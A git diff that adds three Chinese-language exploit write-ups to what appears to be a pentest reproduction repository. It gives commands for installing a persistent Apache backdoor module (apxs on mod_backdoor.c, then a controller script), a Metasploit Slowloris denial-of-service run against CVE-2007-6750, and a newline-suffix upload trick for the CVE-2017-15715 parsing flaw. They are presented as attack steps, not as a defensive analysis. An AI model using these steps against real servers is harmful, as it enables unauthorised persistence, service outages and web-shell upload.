add apache exp
27
03-Apache/Apache后门维持/Apache后门维持.md
Normal file
@ -0,0 +1,27 @@
|
||||
Apache后门维持
|
||||
==============
|
||||
|
||||
一、漏洞简介
|
||||
------------
|
||||
|
||||
通过运行第三方脚本,实现维持后门的方法
|
||||
|
||||
二、漏洞影响
|
||||
------------
|
||||
|
||||
三、复现过程
|
||||
------------
|
||||
|
||||
https://github.com/ianxtianxt/apache-
|
||||
|
||||
### 1、上传 mod\_backdoor.c到服务器,并执行命令
|
||||
|
||||
apxs -i -a -c mod_backdoor.c && service apache2 restart
|
||||
|
||||

|
||||
|
||||
### 2、控制端执行方法
|
||||
|
||||
python exploit.py 127.0.0.1 80
|
||||
|
||||
image
|
BIN
03-Apache/Apache后门维持/resource/Apache后门维持/media/rId25.jpg
Normal file
After Width: | Height: | Size: 99 KiB |
After Width: | Height: | Size: 80 KiB |
After Width: | Height: | Size: 277 KiB |
After Width: | Height: | Size: 162 KiB |
After Width: | Height: | Size: 179 KiB |
@ -0,0 +1,40 @@
|
||||
(CVE-2007-6750)Apache ddos
|
||||
============================
|
||||
|
||||
一、漏洞简介
|
||||
------------
|
||||
|
||||
Apache
|
||||
HTTP服务器1.x和2.x允许远程攻击者通过部分HTTP请求导致拒绝服务(守护进程中断),如Slowloris所示,这与2.2.15之前版本中缺少mod\_ReqTimeout模块有关
|
||||
|
||||
二、漏洞影响
|
||||
------------
|
||||
|
||||
Apache 1.x/2.x
|
||||
|
||||
三、复现过程
|
||||
------------
|
||||
|
||||
nmap -sV -p80
|
||||
192.168.146.175(用nmap查看Apache版本)(Apache2.2.3初步断定存在漏洞)Apacheddos/media/rId24.png)
|
||||
|
||||
接着访问网站查看是否正常(发现网站正常)Apacheddos/media/rId25.png)
|
||||
|
||||
msfconsole(启动metasploit)
|
||||
|
||||
use auxiliary/dos/http/slowloris(使用模块)
|
||||
|
||||
set RHOST 192.168.146.175(设置目标IP)
|
||||
|
||||
run(执行攻击)
|
||||
|
||||
Apacheddos/media/rId26.png)
|
||||
|
||||
再访问网站查看是否正常(发现网站瘫痪)
|
||||
|
||||
Apacheddos/media/rId27.png)
|
||||
|
||||
四、参考链接
|
||||
------------
|
||||
|
||||
> https://www.jsxlo.com/cve-2007-6750/
|
After Width: | Height: | Size: 214 KiB |
After Width: | Height: | Size: 196 KiB |
After Width: | Height: | Size: 219 KiB |
@ -0,0 +1,30 @@
|
||||
(CVE-2017-15715)Apache解析漏洞
|
||||
================================
|
||||
|
||||
一、漏洞简介
|
||||
------------
|
||||
|
||||
二、漏洞影响
|
||||
------------
|
||||
|
||||
Apache 2.4.0到2.4.29
|
||||
|
||||
三、复现过程
|
||||
------------
|
||||
|
||||
首先正常上传一个图片,发现无法上传
|
||||
|
||||
Apache解析漏洞/media/rId24.png)
|
||||
|
||||
如果文件名取自\$\_FILES\[\'file\'\]\[\'name\'\],就会自动把换行符去掉,而文件名取自post参数name中,就能很好的利用到这个解析漏洞
|
||||
|
||||
下面我们上传一个包含换行符的文件,这里需要注意只能时\\x0a而不是\\x0d\\x0a,\\x0d\\x0a的情况是我们直接添加一个换行符,我们利用burp的hex功能在test666.php后面添加一个\\x0a
|
||||
|
||||
Apache解析漏洞/media/rId25.png)
|
||||
|
||||
从响应包中可以看到上传成功了,但是相应页面success.html中并没有告诉我们上传文件的目录
|
||||
|
||||
但是我们在请求包中还可以看到一个参数dir =
|
||||
/upload/,所以猜测上传目录为·/upload/test666.php%0a
|
||||
|
||||
Apache解析漏洞/media/rId26.png)
|
After Width: | Height: | Size: 96 KiB |
After Width: | Height: | Size: 90 KiB |
After Width: | Height: | Size: 207 KiB |